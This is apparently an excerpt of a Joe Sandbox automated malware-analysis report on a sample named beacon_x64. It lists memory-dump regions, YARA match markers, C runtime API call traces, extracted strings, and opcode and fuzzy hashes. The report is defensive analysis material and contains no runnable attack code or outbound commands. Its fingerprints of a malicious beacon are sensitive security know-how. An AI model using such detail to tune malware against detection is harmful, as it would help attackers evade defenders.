            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
            • String ID:
            • API String ID: 2328795619-0
            • Opcode ID: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
            • Instruction ID: c9f6a9b82ba162c3aed79bea13e2ac70d537af80c9d51237c00f3f7064d996b6
            • Opcode Fuzzy Hash: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
            • Instruction Fuzzy Hash: 81511D3032CF0D4B9B2C667C995A13572D1FBD57A0B25833EE45EC32A5EE68DC5242D2
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
            • String ID:
            • API String ID: 1547050394-0
            • Opcode ID: 25a8bf288fd42ce426ab2ae56b53d18e2e8359fd32586f4ae3706e9ff750b65b
            • Instruction ID: 5a2d0af31186f7edea52c00b12f70484e13583af56bfb0dba04fe064d873f837
            • Opcode Fuzzy Hash: 25a8bf288fd42ce426ab2ae56b53d18e2e8359fd32586f4ae3706e9ff750b65b
            • Instruction Fuzzy Hash: 3A219F70618B4A8FEB90FF78980932A76D1FF99350F55497AE449C3221DF68CC418391
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: freemallocstrchr$FreeHeap_errnorand
            • String ID:
            • API String ID: 3504763109-0
            • Opcode ID: f35e4bf4a30ec4413237561f10dac7197b8990473e0b46e11b580f4fb44e5963
            • Instruction ID: 55a7f7b3f32809edf03b681607377b967745f55769353f44a24040a83f39a19a
            • Opcode Fuzzy Hash: f35e4bf4a30ec4413237561f10dac7197b8990473e0b46e11b580f4fb44e5963
            • Instruction Fuzzy Hash: 57711720218E9C8BDF6AAB2C98053F6B3D1FF99349F04856DD58DC7153DE3899478781
            Strings
            Memory Dump Source
            • Source File: 00000000.00000003.2114029429.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_3_1a0000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: #(Sx$7?!)$!'r$!)g$7)($7)($kW
            • API String ID: 0-1342051783
            • Opcode ID: c2008e09e2477f6178a65bb5ccd84e82589d2734430ab7cc653953120529e47c
            • Instruction ID: bb8449dab8b0819161a4a7c099f5af1040bb61130bc138c208501f15d38448d9
            • Opcode Fuzzy Hash: c2008e09e2477f6178a65bb5ccd84e82589d2734430ab7cc653953120529e47c
            • Instruction Fuzzy Hash: FC51207E484756DFD711AE3489834C7BBA9EA8332AB580739C8610F243E7915923CBC3
            APIs
            • malloc.LIBCMT ref: 007631BD
              • Part of subcall function 0077E284: _FF_MSGBANNER.LIBCMT ref: 0077E2B4
              • Part of subcall function 0077E284: _NMSG_WRITE.LIBCMT ref: 0077E2BE
              • Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E2F2
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E2FD
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E308
            • malloc.LIBCMT ref: 007631C8
              • Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E318
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E31D
            • free.LIBCMT ref: 007632AF
            • free.LIBCMT ref: 007632B7
            • free.LIBCMT ref: 007632BF
            • free.LIBCMT ref: 007632CB
            • free.LIBCMT ref: 007632D8
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: free$_errno$_callnewhmalloc
            • String ID:
            • API String ID: 2761444284-0
            • Opcode ID: a46d6df1e63736bbf5e6f8efd513222b2720334364c4a35ae3722e37f335d37b
            • Instruction ID: 9cc776225398e6a65e09f33f8b26a5f77b0bbfd022bf8d26cb7f0aee5b1db5c2
            • Opcode Fuzzy Hash: a46d6df1e63736bbf5e6f8efd513222b2720334364c4a35ae3722e37f335d37b
            • Instruction Fuzzy Hash: E841CD30718F4A9F9B59AB2C986567A77D4FB89310750426DE88BC3207EF24ED02CB85
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: signal
            • String ID: CCG
            • API String ID: 1946981877-1584390748
            • Opcode ID: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
            • Instruction ID: 293b1a304c256a7ee66eff26b1d91746a270e19344e3818b9830088d28418f87
            • Opcode Fuzzy Hash: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
            • Instruction Fuzzy Hash: 1421A171B0154146EE396279865D33B10019B9A374F284E379A3DA73E0DAFECCC2830E
            APIs
              • Part of subcall function 00774FEC: malloc.LIBCMT ref: 00775008
            • malloc.LIBCMT ref: 0076BB3B
              • Part of subcall function 0077E284: _FF_MSGBANNER.LIBCMT ref: 0077E2B4
              • Part of subcall function 0077E284: _NMSG_WRITE.LIBCMT ref: 0077E2BE
              • Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E2F2
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E2FD
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E308
              • Part of subcall function 0077B230: malloc.LIBCMT ref: 0077B29C
              • Part of subcall function 0077DAA8: malloc.LIBCMT ref: 0077DAF8
              • Part of subcall function 0077DAA8: realloc.LIBCMT ref: 0077DB07
            • malloc.LIBCMT ref: 0076BC4A
            • _snprintf.LIBCMT ref: 0076BCC1
            • _snprintf.LIBCMT ref: 0076BCE7
            • _snprintf.LIBCMT ref: 0076BD0E
            • free.LIBCMT ref: 0076BEC6
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: malloc$_snprintf$_errno$_callnewhfreerealloc
            • String ID:
            • API String ID: 74200508-0
            • Opcode ID: fd4b1ce187cf5d2c7b3c7d1d5f2f485ec143d87fcb2d796d9dd721ce5a89571b
            • Instruction ID: e26696343c255ecab97ccd45d56bdc8ef96fb18ce55bd0f77c400ddd59c49d6a
            • Opcode Fuzzy Hash: fd4b1ce187cf5d2c7b3c7d1d5f2f485ec143d87fcb2d796d9dd721ce5a89571b
            • Instruction Fuzzy Hash: A7C1A630714A448BDF18BB78885A66D72D2FBC5341F50852DA94BC7293DF3CDD458792
            APIs
              • Part of subcall function 00774FEC: malloc.LIBCMT ref: 00775008
              • Part of subcall function 0077F620: _errno.LIBCMT ref: 0077F577
              • Part of subcall function 0077F620: _invalid_parameter_noinfo.LIBCMT ref: 0077F582
            • fseek.LIBCMT ref: 00770730
              • Part of subcall function 0077FEA4: _errno.LIBCMT ref: 0077FECC
              • Part of subcall function 0077FEA4: _invalid_parameter_noinfo.LIBCMT ref: 0077FED7
            • _ftelli64.LIBCMT ref: 00770738
              • Part of subcall function 0077FF18: _errno.LIBCMT ref: 0077FF36
              • Part of subcall function 0077FF18: _invalid_parameter_noinfo.LIBCMT ref: 0077FF41
            • fseek.LIBCMT ref: 00770748
              • Part of subcall function 0077FEA4: _fseek_nolock.LIBCMT ref: 0077FEF5
            • malloc.LIBCMT ref: 00770788
              • Part of subcall function 0077E284: _FF_MSGBANNER.LIBCMT ref: 0077E2B4
              • Part of subcall function 0077E284: _NMSG_WRITE.LIBCMT ref: 0077E2BE
              • Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E2F2
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E2FD
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E308
            • fclose.LIBCMT ref: 00770845
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
            • String ID:
            • API String ID: 2887643383-0
            • Opcode ID: f1c4e02295faa99f8843714657dd5281141177bf23df19fa39898597ddf49910
            • Instruction ID: 5e181d30c142f8fa952d89fa4e16031bd4b5536235cd173fb5092053f5e92a9e
            • Opcode Fuzzy Hash: f1c4e02295faa99f8843714657dd5281141177bf23df19fa39898597ddf49910
            • Instruction Fuzzy Hash: 9F51A831718A48CFDB4DEB2CD45A67972D1FB98350B50826EE48FC3296DE689D0687C2
            APIs
            • _mtinitlocknum.LIBCMT ref: 00789375
              • Part of subcall function 00782E58: _FF_MSGBANNER.LIBCMT ref: 00782E75
              • Part of subcall function 00782E58: _NMSG_WRITE.LIBCMT ref: 00782E7F
            • _lock.LIBCMT ref: 00789388
            • _lock.LIBCMT ref: 007893E3
            • _calloc_crt.LIBCMT ref: 0078949A
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _lock$_calloc_crt_mtinitlocknum
            • String ID:
            • API String ID: 3962633935-0
            • Opcode ID: b1e94c722dda090378a8e761eed7513b06593d91ccd6790d0d4411b736f80c7c
            • Instruction ID: 293a3b589aa27a4315a13af73b9f43b4cada5b07f89be46eab6da782cba23a7f
            • Opcode Fuzzy Hash: b1e94c722dda090378a8e761eed7513b06593d91ccd6790d0d4411b736f80c7c
            • Instruction Fuzzy Hash: 88511670558B488FDB18AF58C885276B7D0FB58310F19065DE98EC72A2DB78DC43CB82
            APIs
            • malloc.LIBCMT ref: 0076453A
              • Part of subcall function 0077E284: _FF_MSGBANNER.LIBCMT ref: 0077E2B4
              • Part of subcall function 0077E284: _NMSG_WRITE.LIBCMT ref: 0077E2BE
              • Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E2F2
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E2FD
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E308
            • malloc.LIBCMT ref: 00764545
              • Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E318
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E31D
            • free.LIBCMT ref: 0076462C
            • free.LIBCMT ref: 00764634
            • free.LIBCMT ref: 00764640
            • free.LIBCMT ref: 0076464D
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: free$_errno$_callnewhmalloc
            • String ID:
            • API String ID: 2761444284-0
            • Opcode ID: 9dd44889f23309e2c133c4e883ac3d7c03cf28f4ebc62bcd805b5d39935d1e2d
            • Instruction ID: 0e59e4cb0128d0bb08517e6745bf244310a2791b5ed09b6ae71e18c3bab3e644
            • Opcode Fuzzy Hash: 9dd44889f23309e2c133c4e883ac3d7c03cf28f4ebc62bcd805b5d39935d1e2d
            • Instruction Fuzzy Hash: FD41F431318F0D4B9B2DAA2C884557A76D9EB9B355B14416DD88BC3213ED28DC0787C2
            APIs
            • _fileno.LIBCMT ref: 007813B9
              • Part of subcall function 00784A54: _errno.LIBCMT ref: 00784A5D
              • Part of subcall function 00784A54: _invalid_parameter_noinfo.LIBCMT ref: 00784A68
            • _errno.LIBCMT ref: 007813C9
              • Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C
            • _errno.LIBCMT ref: 007813E5
            • _isatty.LIBCMT ref: 00781446
            • _getbuf.LIBCMT ref: 00781452
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
            • String ID:
            • API String ID: 304646821-0
            • Opcode ID: c35e8c2de9f02937b40d8dcb44627bb11330896f7d068decc206105344bae12a
            • Instruction ID: 821138d1e5f914a6db4f1819ecc2cb32554c935b0c823d4c023772fd0f7d0855
            • Opcode Fuzzy Hash: c35e8c2de9f02937b40d8dcb44627bb11330896f7d068decc206105344bae12a
            • Instruction Fuzzy Hash: 0341E230294B488FCB58FF6CC48676577E5FF48320BA44699D85ACB296DB78DC82C781
            APIs
            • malloc.LIBCMT ref: 0077824F
              • Part of subcall function 0077E284: _FF_MSGBANNER.LIBCMT ref: 0077E2B4
              • Part of subcall function 0077E284: _NMSG_WRITE.LIBCMT ref: 0077E2BE
              • Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E2F2
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E2FD
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E308
            • _snprintf.LIBCMT ref: 00778267
              • Part of subcall function 0077E63C: _errno.LIBCMT ref: 0077E673
              • Part of subcall function 0077E63C: _invalid_parameter_noinfo.LIBCMT ref: 0077E67E
            • free.LIBCMT ref: 0077827E
              • Part of subcall function 0077E244: RtlFreeHeap.NTDLL ref: 0077E25A
              • Part of subcall function 0077E244: _errno.LIBCMT ref: 0077E264
            • malloc.LIBCMT ref: 007782CE
            • _snprintf.LIBCMT ref: 007782E6
            • free.LIBCMT ref: 0077830E
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _errno$_snprintffreemalloc$FreeHeap_callnewh_invalid_parameter_noinfo
            • String ID:
            • API String ID: 343393124-0
            • Opcode ID: faf2166294d0965833cb84c6e7fe882f3c5ed13ceeefabe40a4c11aee224dca5
            • Instruction ID: 5bd3436c9a0313dc8569014346f5b8b1deb053a5d6c5bcc6e5dd66d26f3edcea
            • Opcode Fuzzy Hash: faf2166294d0965833cb84c6e7fe882f3c5ed13ceeefabe40a4c11aee224dca5
            • Instruction Fuzzy Hash: E031B33070CE4C4FDB98AB2CA82977877D2F79D710754869DE08EC3257DE289C428786
            APIs
            • malloc.LIBCMT ref: 0076EC85
              • Part of subcall function 0077E284: _FF_MSGBANNER.LIBCMT ref: 0077E2B4
              • Part of subcall function 0077E284: _NMSG_WRITE.LIBCMT ref: 0077E2BE
              • Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E2F2
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E2FD
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E308
            • free.LIBCMT ref: 0076ECC0
            • fwrite.LIBCMT ref: 0076ED01
            • fclose.LIBCMT ref: 0076ED09
            • free.LIBCMT ref: 0076ED16
              • Part of subcall function 0077E244: RtlFreeHeap.NTDLL ref: 0077E25A
              • Part of subcall function 0077E244: _errno.LIBCMT ref: 0077E264
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _errno$free$FreeHeap_callnewhfclosefwritemalloc
            • String ID:
            • API String ID: 415550720-0
            • Opcode ID: c287650ca013cd6fba82a94b2bfab312077d62521af6d54d1c0599a360ecab3d
            • Instruction ID: 7f6e41daabbb6c495644a3afa69bc307d0ad2a1136c7c9240cc8286b911a8d9c
            • Opcode Fuzzy Hash: c287650ca013cd6fba82a94b2bfab312077d62521af6d54d1c0599a360ecab3d
            • Instruction Fuzzy Hash: 10215E20728E088FDB85FB6C845926EB2D2FB98384F54456DA44EC3286EE68DD018782
            APIs
            • _errno.LIBCMT ref: 007895FD
              • Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C
            • __doserrno.LIBCMT ref: 007895F5
              • Part of subcall function 00780CA8: _getptd_noexit.LIBCMT ref: 00780CAC
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _getptd_noexit$__doserrno_errno
            • String ID:
            • API String ID: 2964073243-0
            • Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
            • Instruction ID: d81ed5117c0eca044b34a26e65ebba909fd7064c4c26679c6bc089a52d94aeb6
            • Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
            • Instruction Fuzzy Hash: C1F0F6303A49488EE799BB74C85537832A0FF11335FA84354E105C71E6EB7C54458762
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _snprintf
            • String ID:
            • API String ID: 3512837008-0
            • Opcode ID: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
            • Instruction ID: c111cbc10fb1c1b4aeaef88a0b9d831f730f57d2761ceac17baf2d471b1f9886
            • Opcode Fuzzy Hash: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
            • Instruction Fuzzy Hash: FF819431628A488FDB55FF28DC85BAA73E5FB99304F10456AE84BC3151DF38D945CB82
            APIs
            • malloc.LIBCMT ref: 0077E00F
              • Part of subcall function 0077E284: _FF_MSGBANNER.LIBCMT ref: 0077E2B4
              • Part of subcall function 0077E284: _NMSG_WRITE.LIBCMT ref: 0077E2BE
              • Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E2F2
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E2FD
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E308
            • malloc.LIBCMT ref: 0077E01D
              • Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E318
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E31D
            • malloc.LIBCMT ref: 0077E03F
            • _snprintf.LIBCMT ref: 0077E05A
              • Part of subcall function 0077E63C: _errno.LIBCMT ref: 0077E673
              • Part of subcall function 0077E63C: _invalid_parameter_noinfo.LIBCMT ref: 0077E67E
            • malloc.LIBCMT ref: 0077E075
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
            • String ID:
            • API String ID: 2026495703-0
            • Opcode ID: b352101c7262c8bcb4a5e96376bd10b91777e0dce9561e268234f3b9efdf5141
            • Instruction ID: 4bb1e1339e998c6aa3d7dac8f45b7ec76bca966c5d0deecd3cf406aca55126e2
            • Opcode Fuzzy Hash: b352101c7262c8bcb4a5e96376bd10b91777e0dce9561e268234f3b9efdf5141
            • Instruction Fuzzy Hash: E911467061CF044FDBA8EB6CA44521576D1F79C350F1045AEF09EC3396EA389D4147C1
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
            • String ID:
            • API String ID: 634798775-0
            • Opcode ID: 34e7f92ebff520e6a17a4e985317f9f17b8bd586bad3667c73d28a98cf0395a5
            • Instruction ID: 6428cc6b0d270ce9e16723fe7d8739c6394ee74e622c709db41eb6123e251746
            • Opcode Fuzzy Hash: 34e7f92ebff520e6a17a4e985317f9f17b8bd586bad3667c73d28a98cf0395a5
            • Instruction Fuzzy Hash: 26412A30318F0D8FDF6C6E6D564A23572C0EB69750B64827ED49EC3172EAA9DC5282C6
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: clock
            • String ID:
            • API String ID: 3195780754-0
            • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
            • Instruction ID: a3bd9b35f68840097c4e433f8cdf26b5075fff118026e843731e07a4d12d2bc7
            • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
            • Instruction Fuzzy Hash: CE11727140C70D8F473CBDA8988653BB7D0EB96350F15466EED8BC3212F9A49C4287D6
            Strings
            • Unknown pseudo relocation protocol version %d., xrefs: 004022A8
            • Unknown pseudo relocation bit size %d., xrefs: 00402294
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID:
            • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
            • API String ID: 0-395989641
            • Opcode ID: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
            • Instruction ID: 8c8005ec778b1d8b89afdaa8f366cc80ce98c81ac44c8c214e0d273334ccb7fd
            • Opcode Fuzzy Hash: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
            • Instruction Fuzzy Hash: 1A711276B10B9487DB20CF61DA4875A7761FB59BA8F54822AEF08277E8DB7CC540C608
            APIs
            • calloc.LIBCMT ref: 00760D6A
              • Part of subcall function 0078DE08: _calloc_impl.LIBCMT ref: 0078DE18
              • Part of subcall function 0078DE08: _errno.LIBCMT ref: 0078DE2B
              • Part of subcall function 0078DE08: _errno.LIBCMT ref: 0078DE35
            • free.LIBCMT ref: 00760EF3
            • free.LIBCMT ref: 00760EFD
              • Part of subcall function 0077E244: RtlFreeHeap.NTDLL ref: 0077E25A
              • Part of subcall function 0077E244: _errno.LIBCMT ref: 0077E264
            • free.LIBCMT ref: 00760F0F
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _errnofree$FreeHeap_calloc_implcalloc
            • String ID:
            • API String ID: 2553729582-0
            • Opcode ID: d93992b633c35f2e37b516dd72fb4d9a33d59668b61f8d19e3ffcf9038676577
            • Instruction ID: 88611cfce028fd107b0e915a4b716b783549fae80e164730d5aecc6aeadf9fae
            • Opcode Fuzzy Hash: d93992b633c35f2e37b516dd72fb4d9a33d59668b61f8d19e3ffcf9038676577
            • Instruction Fuzzy Hash: C5D13D70618B488FDB58DF5CD4897AABBE1FB98305F10462EE88EC3251DB74D945CB82
            APIs
            Strings
            • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
            • Address %p has no image-section, xrefs: 00401DC0, 00401FA5
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: QueryVirtual
            • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
            • API String ID: 1804819252-157664173
            • Opcode ID: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
            • Instruction ID: 3b33824f85b17f90b3a42b000daced5dafaf341a27cace3064c240a44d9835c1
            • Opcode Fuzzy Hash: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
            • Instruction Fuzzy Hash: C43106B3701A41A6EB128F12ED417593761B755BEAF48413AEF0C173A1EB3CD986C788
            APIs
            • _errno.LIBCMT ref: 0077E8B1
              • Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C
            • _invalid_parameter_noinfo.LIBCMT ref: 0077E8BC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
            • String ID: B
            • API String ID: 1812809483-1255198513
            • Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
            • Instruction ID: 864e47c8bfa6ab0344e47039fc29137514ffc30858f4f77ab2d5d2fc3d6a7225
            • Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
            • Instruction Fuzzy Hash: F3118F30628B088FDB44EF589485765B7D1FBA8324F6047AEA41DC72A1DB78C984C782
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: __set_app_type
            • String ID: 06E$P0E
            • API String ID: 1108511539-3978550416
